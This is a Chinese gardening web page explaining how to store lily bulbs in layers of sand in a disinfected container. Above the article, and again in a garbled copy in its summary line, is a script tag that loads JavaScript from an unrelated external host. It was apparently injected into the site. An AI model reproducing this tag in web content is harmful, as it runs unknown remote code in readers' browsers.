您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

百合的贮藏保鲜

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=6840"/gt; 百合比较喜温怕冷,受风后鳞片会变红、干萎。其贮藏方法较多,尤以黄沙埋藏法效果较好。具体做法是:在室内用砖头或水泥砌一个埋藏坑,也可用木箱、箩筐等作容器,在容器底部先铺上一层
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=6840"></Script>  百合比较喜温怕冷,受风后鳞片会变红、干萎。其贮藏方法较多,尤以黄沙埋藏法效果较好。具体做法是:在室内用砖头或水泥砌一个埋藏坑,也可用木箱、箩筐等作容器,在容器底部先铺上一层黄沙,约20毫米厚,然后一层百合一层黄沙,堆至离容器口50毫米左右。上面再用黄沙覆盖,不让百合暴露在空气中。这种方法应注意的是:贮藏用的容器事先用0.5%漂白粉溶液消毒,晒干后使用;百合贮藏不宜过多翻动,一般隔20-30天抽查1次;贮藏室保持整洁、卫生。